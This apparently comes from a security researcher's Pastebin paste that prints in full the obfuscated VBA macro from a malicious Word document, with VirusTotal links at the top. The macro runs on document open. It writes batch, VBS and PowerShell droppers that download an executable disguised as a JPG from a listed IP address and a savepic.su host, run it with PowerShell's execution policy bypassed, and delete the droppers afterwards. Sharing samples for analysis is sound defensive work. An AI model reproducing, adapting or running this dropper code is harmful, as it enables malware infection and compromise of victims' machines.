Advertisement
Guest User

Untitled

a guest
Mar 12th, 2015
247
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.31 KB | None | 0 0
  1. hi from techhelplist.com
  2.  
  3. macro from malicious .doc :
  4. https://www.virustotal.com/en/file/b8d2a5f16ea925365b077d763e79ac0ced60b7e22ad16307e2ccc73a4a5a05fe/analysis/
  5.  
  6. downloads : 91.194.254.213/us/file.jpg (actually an exe)
  7. https://www.virustotal.com/en/file/6a6cca89ce2ef9ec3ca0e75cb3fdbe6306de26f58769f2778dca5da7252d50cd/analysis/
  8. -----------------------------------------------------------
  9.  
  10. Rem Attribute VBA_ModuleType=VBADocumentModule
  11. Option VBASupport 1
  12. Sub Auto_Open()
  13. h
  14. End Sub
  15. Sub h()
  16.  
  17. BART212 = "" & "d-up" + "date"
  18. BART2 = Chr(97) + Chr(100) & "" & "o" & "" & "b" & "e" + "ac" & BART212
  19. JISKKK = "" & "" & Chr(97) + Chr(100) + "o" & "b" & "ea" & "c" + BART212
  20. VBT2 = "" & JISKKK & ""
  21. VBTXP2 = Chr(97) & Chr(100) & "o" & "be" + "ac" & BART212 + "x" & "" & "" & Chr(Asc("p")) & ""
  22.  
  23. PST2 = VBT2
  24. HUEFQ = "" + Module4.Plain("" & "us" & "er" + Chr(110) & "a" + Chr(109) + Chr(101) & "")
  25. PST1 = "" + PST2 + "." + Chr(Asc("p")) + Chr(100 + 15) + "1" + ""
  26. VBT1 = "" + VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
  27. JJJJJJJJJJJJJIOWQJDOQWIHDUIQWTYTYDQWYGG = "jgh 12jh3ggh121hgj3gh12jghj123g21jkh 3" + _
  28. "h j23hgjk23gh4gkg234jh23jhgl3k 23jk 4lhgj4g 2jh4g23jh 4jh32g ghj23g 4jh23g4jh23g4jh324 "
  29. VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
  30. STT = "" + "44" + "4." + "pn" + "g" + ""
  31.  
  32. hjife = 51 + 50 + Sgn(-6)
  33. kktd = hjife
  34. BART = "" + BART2 + Chr(Abs(kktd - 100 - 45 - Sgn(5))) + Chr(Abs(kktd - 100 - 96 - 2)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(Abs(kktd - 100 - 15 - 1)))) + ""
  35. KJASKDJ = "kj23 k4j3k2jlk23j 4kl32j4 kh3 4jk23g 4hj23gfh gh2f 4hfg234hfg 23hgfg4f4 hg2f 4hg23f 4gh23f4h23f4 h23gf 4h23"
  36. 'JSIQOJQ = ""
  37.  
  38. JSIQOJQ = Chr(Abs(kktd - Sqr(4) - 100 - 44)) + Chr(Abs(kktd - 100 - 97 - Module3.Signing(15))) + Chr(Asc(Chr(Abs(kktd / 2 + Sqr(4) + 44 + Sgn(Sqr(16)))))) + Chr(Asc(Chr(kktd + Fix(16.2))))
  39. KJHDU = BART2 + JSIQOJQ
  40. BART = KJHDU
  41.  
  42. MY_FILENDIR = "c" & ":\" + Chr(Asc("U")) + "s" & "ers\" + HUEFQ + "\App" + "" & "Da" & "ta\Lo" + "cal\T" + "emp\" + PST1 + "" & ""
  43. STAT = "" + "c" & ":\" + Chr(Asc("U")) + "s" & "ers\" + HUEFQ + "\App" + "" & "Da" & "ta\Lo" + "cal\T" + "emp\" + STT + "" & ""
  44. ASDASDSA = "" + "c" & ":\" + Chr(Asc("U")) + "s" & "ers\" + HUEFQ + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "e" & "mp\" + BART + "" & ""
  45. MY_FILDIR = "c" & ":\U" & "s" & "ers\" + HUEFQ + "\App" + "" & "Da" & "ta\Lo" + "cal\T" + "emp\" + VBT1
  46.  
  47. XPFILEDIR = ""
  48. HJUTTT = VBTXP
  49. XPFILEDIR = "" + "c" & ":\W" & "indows\T" & "emp\" + HJUTTT
  50. UHFD = "" & "c" & ":\W" & "indows\T" & "emp\"
  51. TRT = UHFD + BART
  52. KRT = TRT
  53. HYF = KRT
  54.  
  55. KJSAHDFFFJ = MY_FILDIR
  56.  
  57.  
  58. Dim Kjqiwdj, FileNumber, FileNumb, FileNu, FileNuG, FileNs, mttt, jskw As Integer
  59. Dim Uuwqdhj As Integer
  60.  
  61. Dim retVal As Variant
  62.  
  63. FileNumber = FreeFile
  64. FileNumb = FreeFile
  65. FileNu = FreeFile
  66. FileNukk = FreeFile
  67.  
  68. FileNs = FreeFile
  69. Kasdwq = FreeFile
  70. FileNuG = FreeFile
  71.  
  72. Dim objWMIService As Variant
  73. Dim colOperatingSystems As Variant
  74. Dim objOperatingSystem As Variant
  75.  
  76. Set objWMIService = GetObject _
  77. ("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  78. SETL = "colOperatingSystemsKSAHDIUOQWdsad asad32k r8929h2f uigt8y yr2u3gby2g yu dg2uyg3bdu "
  79.  
  80. Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
  81. For Each objOperatingSystem In colOperatingSystems
  82. SysReport = SysReport & "The operating system on this computer is " & _
  83. objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
  84. Next
  85.  
  86. Set objWMIService = GetObject _
  87. ("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  88. Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
  89. For Each objOperatingSystem In colOperatingSystems
  90. winverstr = objOperatingSystem.Version
  91. Next
  92.  
  93. winver = Val(winverstr)
  94. WaitFor (1)
  95. jskw = winver
  96.  
  97.  
  98. URLLSK = "91.194.254.213/us/file"
  99. STAA = "sa" & "vepic.su/5347313"
  100. STAB = "sa" & "vepic.su/5339121"
  101.  
  102. ' UWGD = XPFILEDIR
  103. ' If (Len(Dir(MY_FILENDIR)) <> 0) Then
  104. ' SetAttr MY_FILENDIR, vbNormal
  105. ' Kill MY_FILENDIR
  106. ' End If
  107.  
  108. ' If (Dir(ASDASDSA) <> "") Then
  109. ' SetAttr ASDASDSA, vbNormal
  110. ' Kill ASDASDSA
  111. ' End If
  112.  
  113.  
  114. ' If (Dir(MY_FILDIR) <> "") Then
  115. ' SetAttr MY_FILDIR, vbNormal
  116. ' Kill KJSAHDFFFJ
  117. ' End If
  118.  
  119.  
  120. ' If (Dir(STAT) <> "") Then
  121. ' SetAttr STAT, vbNormal
  122. ' Kill STAT
  123. ' End If
  124.  
  125.  
  126. ' If (Dir(UWGD) <> "") Then
  127. ' SetAttr UWGD, vbNormal
  128. ' Kill UWGD
  129. ' End If
  130.  
  131.  
  132.  
  133. If (jskw <= 5.5) Then
  134. 'NUWHDGJS = UHFD + "euifhszdf.jfi"
  135. 'Open NUWHDGJS For Output As #Kasdwq
  136. 'Close #Kasdwq
  137. NUWHDGJS = HYF
  138. Open NUWHDGJS For Output As #Kasdwq
  139. Print #Kasdwq, ""
  140. Print #Kasdwq, "" & Chr(Asc("@")) & "e" & "cho off"
  141. Print #Kasdwq, ":pinkator"
  142. Print #Kasdwq, Chr(Asc("p")) & "in" + "g 1.3.1.2 -n" & " 2" + ""
  143. KIWJIQDKLWQDNKWQD = "kwhjek21 jehgj12 21jhge hj21gh1j2geh 1j2egk j1heg kjfteyf y1hg 12hf eh1g2efj 12"
  144. Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\W" + "indows\T" + "emp" + "\" + VBTXP + Chr(34)
  145. Print #Kasdwq, Chr(Asc("p")) & "in" + "g 2.2.1.1 -n" & " 2" + ""
  146. Print #Kasdwq, "" & ":windows"
  147. Print #Kasdwq, ""
  148. Print #Kasdwq, "" + "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc(Chr(Asc("e")))) + Chr(Asc("x")) + Chr(Asc("e"))
  149. Print #Kasdwq, ":loop"
  150. Print #Kasdwq, Chr(Asc("p")) & "in" + "g " + "1.3.1.2 -n" & _
  151. " 1"
  152. Print #Kasdwq, "set tar1=" + Chr(34) + BART + Chr(33 + 1)
  153. Print #Kasdwq, "set stat=" + Chr(34) + STT + Chr(33 + 1)
  154. Print #Kasdwq, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
  155. Print #Kasdwq, "del " + Chr(34) + "c" & ":\" & "W" & "ind" & "ows\T" & "em" & "p\" + Chr(34) + "" + "%ta" + "r1%" + "" & ""
  156. Print #Kasdwq, "del " + Chr(34) + "c" & ":\" & "W" & "ind" & "ows\T" & "em" & "p\" + Chr(34) + "" + "%s" + "tat%" + "" & ""
  157. Print #Kasdwq, "if " + "exist " + Chr(34) & "" & "c" & ":\W" + "indows\T" + "emp\" + Chr(34) + "%tar1%" + " goto loop" + ""
  158. Print #Kasdwq, "" + "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "e" & "mp\" + "" & "" + VBTXP + Chr(34) + " g" + "ot" + "o lo" + "op" + ""
  159. Print #Kasdwq, "exit"
  160. Close #Kasdwq
  161.  
  162. WaitFor (2)
  163. mttt = 88
  164.  
  165. Open XPFILEDIR For Output As #FileNumber
  166. Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + URLLSK + "." + "" & Chr(Asc("j")) + Chr(Asc("p")) + "g" + Chr(34)
  167. Print #FileNumber, "statRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + STAA + "." + Chr(Asc("p")) + Chr(Asc("n")) + "g" + Chr(34)
  168. Print #FileNumber, "" + "jfeuygq = " + Chr(34) + "4.e" + Chr(34) + "+" + Chr(34) + "xe" + Chr(34)
  169. Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + Chr(34) + "+" + "jfeuygq"
  170. Print #FileNumber, "frgea =" + Chr(34) + "M" + Chr(34) + "+" + Chr(34) + "SX" + Chr(34) + "+" + Chr(34) + "ML2.X" + Chr(34) + "+" + Chr(34) + "MLH" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + "Chr(80)"
  171. Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(frgea)" + ""
  172. Print #FileNumber, "Set mkH = C" + "reate" + Chr(Asc("O")) + "bject(frgea)"
  173. Print #FileNumber, "" + "" & "objXM" & "LH" & "T" & "TP.op" & "en " + Chr(34) + "G" & "ET" + Chr(34) + ", strRT, False"
  174. Print #FileNumber, "mkH" & ".op" & "en " + Chr(34) + "G" & "ET" + Chr(34) + ", statRT, False" + ""
  175.  
  176. JASHDJK = "send()"
  177. Print #FileNumber, "objXMLHTTP." + JASHDJK + " "
  178. Print #FileNumber, "mkH." + JASHDJK + " "
  179. Print #FileNumber, "" & "If objXMLHTTP.Status = 200 Then" + "" & ""
  180. Print #FileNumber, "uwqhda = " + Chr(34) + "ADODB." + Chr(34)
  181. Print #FileNumber, "" + "Set objADOStream = C" + "reateO" + "bject(uwqhda+Chr(Sgn(-4)+84)+" + Chr(34) + "tream" + Chr(34) + ")"
  182. Print #FileNumber, "" + "ob" + "jA" + "DOSt" + "ream.O" + "pen " + ""
  183. Print #FileNumber, "objADOStream.Type = 1"
  184. Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "" + "sp" + "onse" + "Body "
  185. Print #FileNumber, "objADOStream.Position = 0 "
  186. Print #FileNumber, "objADOStream.S" & "aveToF" & "ile st" & "rT" & "ecation " + ""
  187. Print #FileNumber, "objADOStream.Close "
  188. Print #FileNumber, "Set objADOStream = Nothing "
  189. Print #FileNumber, "End if "
  190. Print #FileNumber, "" + "Set objXMLHTTP = Nothing"
  191. Print #FileNumber, "Set objS" + "hell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")" + ""
  192.  
  193. Print #FileNumber, ""
  194. Close #FileNumber
  195.  
  196. WaitFor (1)
  197. ASKJD = TRT
  198. NUS = Module3.France(retVal, ASKJD)
  199.  
  200. End If
  201.  
  202.  
  203.  
  204. If (winver > 5.5) Then
  205. Open MY_FILENDIR For Output As #FileNumber
  206. Print #FileNumber, "$do" & "wn = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
  207. Print #FileNumber, "" & "$stat = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(116))) & "" + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://" + STAB & "" & ".p" & "n" + "g';"
  208. HUHHUUHUHUHUHUKMK = "6ht76 7tftf t7f 7f yfk ftyf6f tu ftyf "
  209. Print #FileNumber, "$gg" + "tt = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(116))) & "" + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://" + URLLSK & "" & "." & "" & "j" & "p" + "g';"
  210. Print #FileNumber, "" & "$fi" & "le = 'c:\U" & "sers\" + HUEFQ + "\Ap" + "pData\Lo" + "cal\T" & "e" + "mp\" + "4" & "44." + Chr(101) & "xe';" + ""
  211. Print #FileNumber, "$statfile = 'c:\Users\" + HUEFQ + "\App" & "Data\Loc" & "al\Tem" & "p\" + "4" & "44." + "j" & "pg';"
  212. Print #FileNumber, "" & "" & "" & "" & "$do" & "wn.hea" & "ders[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Ma" & "cintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25'" + "+''" + "" + ";"
  213. Print #FileNumber, "$dasdw='123';"
  214. Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($gg" & "tt,$" & "file);"
  215. Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($s" & "tat,$" & "statfile);"
  216. Print #FileNumber, "$asdw='123';"
  217. Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  218. Print #FileNumber, "$noneFilePath = 'c:\Users\" + HUEFQ + "\App" & "Data\Lo" & "cal\Te" & "mp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
  219.  
  220. Print #FileNumber, "$vbsFilePath = 'c:\Users\" + HUEFQ + "\Ap" & "pData\Lo" & "cal\Te" & "mp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + "+" + Chr(39) + Chr(39) + ";"
  221. Print #FileNumber, "$statFilePath = 'c:\Users\" + HUEFQ + "\Ap" & "pData\Lo" & "cal\Te" & "mp\" + "444" + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "j" + Chr(39) + Chr(43) + Chr(39) + "pg" + Chr(39) + ";"
  222. Print #FileNumber, "$b" + "tFilePath = 'c:\Users\" + HUEFQ + "\Ap" & "pData\Lo" & "cal\Te" & "mp\" + BART2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
  223. Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + HUEFQ + "\Ap" & "pData\Lo" & "cal\Te" & "mp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"
  224.  
  225.  
  226. Print #FileNumber, "St" & "art-Sleep -s 15;"
  227.  
  228. Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + HUEFQ + "\App" & "Data\Lo" & "cal\T" & "emp" + "\444.e" & Chr(120) & "e'; "
  229. Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
  230. Print #FileNumber, "$file2 = gci $" + "b" + "t" + "FilePath -Force"
  231.  
  232. Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
  233. Print #FileNumber, "" + "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  234. Print #FileNumber, "" + "If (Test-Path $b" + "tFileP" + "ath){ Remove-Item $b" + "tFileP" + "ath }" + ""
  235. Print #FileNumber, "" + "If (Test-Path $s" + "tatFileP" + "ath){ Remove-Item $st" + "atFileP" + "ath }" + ""
  236. Print #FileNumber, "" + "$jsdhyfueh2hds = 'asdghyg23d jashdhsagdhasghdhgas';" + ""
  237. Print #FileNumber, "" + "If (Test-Path $no" + "neFi" + "leP" + "ath){ Remove-Item $n" + "oneFi" + "lePa" + "th }" + ""
  238. Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  239. Close #FileNumber
  240. KJUCBHS = " = "
  241.  
  242. Open MY_FILDIR For Output As #FileNumb
  243. Print #FileNumb, "Dim dff"
  244. Print #FileNumb, "dff = 68"
  245. Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
  246. Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & "&" & Chr(34) & "S" & Chr(34) & Chr(38) & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) + "&" + Chr(34) + Chr(34) & ")"
  247. Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + HUEFQ + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
  248. Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "he" + Chr(Asc("l")) + Chr(Asc("l")) + KJUCBHS & Chr(Sgn(-4) + 68) + "reate" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")" + ""
  249. Print #FileNumb, "" + "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " + Chr(34) + Chr(34) + "+" & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) + Chr(34) + "+" + Chr(34) + Chr(34) + "+" + Chr(34) + Chr(34) + "+" + Chr(34) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true" + "" & ""
  250.  
  251. Print #FileNumb, ""
  252. Close #FileNumb
  253.  
  254. Open ASDASDSA For Output As #FileNs
  255. Print #FileNs, "@echo off"
  256. Print #FileNs, "pi" + "ng 1.1.2.2 -n" & " 2"
  257. Print #FileNs, "chcp 1251"
  258. Print #FileNs, ":asdqwqdw"
  259. Print #FileNs, "set Gds1=" + Chr(34) + "." + Chr(34)
  260. Print #FileNs, "set Gds2=" + Chr(34) + "v" + Chr(34)
  261. Print #FileNs, "set Gds3=" + Chr(34) + "bs" + Chr(34)
  262. Print #FileNs, "set Gds4=" + Chr(34) & "c:\Users\" + HUEFQ + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34)
  263. Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & "%Gds4%" + "%Gds1%%Gds2%%Gds3%"
  264. Print #FileNs, "exit"
  265. Close #FileNs
  266.  
  267. SetAttr MY_FILENDIR, vbNormal
  268. SetAttr ASDASDSA, vbNormal
  269. SetAttr MY_FILDIR, vbNormal
  270.  
  271. WaitFor (1)
  272.  
  273. LJSUIAJHDKQ = ASDASDSA
  274. NUS = Module3.France(retVal, LJSUIAJHDKQ)
  275.  
  276. End If
  277.  
  278. findTest
  279. secondTest
  280. For Each myStoryRange In ActiveDocument.StoryRanges
  281. With myStoryRange.Find
  282. .Text = "" + "<" & "sel" & "ect>" + ""
  283. .Replacement.Text = " "
  284. .Wrap = wdFindContinue
  285. .Execute Replace:=wdReplaceAll
  286. End With
  287. Next myStoryRange
  288.  
  289. For Each myStoryRange In ActiveDocument.StoryRanges
  290. With myStoryRange.Find
  291. .Text = "</s" & "ele" & "ct>"
  292. .Replacement.Text = " "
  293. .Wrap = wdFindContinue
  294. .Execute Replace:=wdReplaceAll
  295. End With
  296. Next myStoryRange
  297.  
  298. For Each myStoryRange In ActiveDocument.StoryRanges
  299. With myStoryRange.Find
  300. .Text = "<" & "in" & "box>"
  301. .Replacement.Text = " "
  302. .Wrap = wdFindContinue
  303. .Execute Replace:=wdReplaceAll
  304. End With
  305. Next myStoryRange
  306.  
  307. For Each myStoryRange In ActiveDocument.StoryRanges
  308. With myStoryRange.Find
  309. .Text = "</" & "in" & "box>"
  310. .Replacement.Text = " "
  311. .Wrap = wdFindContinue
  312. .Execute Replace:=wdReplaceAll
  313. End With
  314. Next myStoryRange
  315.  
  316. End Sub
  317. Sub WaitFor(NumOfSeconds As Long)
  318. Dim SngSec As Long
  319. SngSec = Timer + NumOfSeconds
  320.  
  321. Do While Timer < SngSec
  322. DoEvents
  323. Loop
  324.  
  325. End Sub
  326.  
  327. Sub AutoOpen()
  328. Auto_Open
  329. End Sub
  330. Sub Workbook_Open()
  331. Auto_Open
  332. End Sub
  333. Sub findTest()
  334. Dim firstTerm, secondTerm, selectedText As String
  335. Dim hhhg, selRange As Range
  336. Set hhhg = ActiveDocument.Range
  337. JIS = Chr(Asc(Chr(60)))
  338. IHRR = "" & JIS + "" + "s" + "e" & "l" & "e" + "c" & "t>" + KSJD + ""
  339. JFRR = "" & JIS + "" + "/" + "s" & "e" + "l" & "e" & "c" + "t>" + ""
  340. firstTerm = "" & IHRR
  341. secondTerm = "" & JFRR
  342.  
  343. WITHrtas = "Find"
  344. With hhhg.Find
  345. .Text = firstTerm
  346. .MatchWholeWord = True
  347. 'ashdkjqhdkjqwhdjk
  348. .Execute
  349. EXECUTEFD = "lakjsd"
  350. hhhg.Collapse direction:=wdCollapseEnd
  351. Set selRange = ActiveDocument.Range
  352. selRange.Start = hhhg.End
  353. .Text = secondTerm
  354. .MatchWholeWord = True
  355. 'kashdjkashdkjashdjksh
  356. .Execute
  357.  
  358. hhhg.Collapse direction:=wdCollapseStart
  359. selRange.End = hhhg.Start
  360. selectedText = selRange.Delete
  361. End With
  362. End Sub
  363.  
  364. Sub secondTest()
  365. Dim firstTerm As String
  366. Dim secondTerm As String
  367. Dim myRanget As Range
  368. Dim yytt As Range
  369. Dim selRanget As Range
  370. Dim selectedTextt As String
  371.  
  372. Set yytt = ActiveDocument.Range
  373.  
  374. firstTerm = "<" + "in" & "bo" + "x>"
  375. secondTerm = "</" + "in" & "bo" + "x>"
  376. With yytt.Find
  377. .Text = firstTerm
  378. .MatchWholeWord = True ' MatchWholeWord
  379. LAJSDHUW = ".MatchWholeWord askj das"
  380. 'jklasjdklsajdiqow
  381. .Execute
  382. yytt.Collapse direction:=wdCollapseEnd
  383.  
  384. Set selRanget = ActiveDocument.Range
  385. selRanget.Start = yytt.End
  386. '2jhkhgsdsgsj
  387. .Text = secondTerm
  388. .MatchWholeWord = True
  389. '2jhkhgsdsgsj
  390. .Execute
  391. EXECUTEFD = "lakjsd"
  392. yytt.Collapse direction:=wdCollapseStart
  393. selRanget.End = yytt.Start
  394. selectedTextt = selRanget
  395. selRanget.Font.Color = wdColorBlack
  396. End With
  397. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement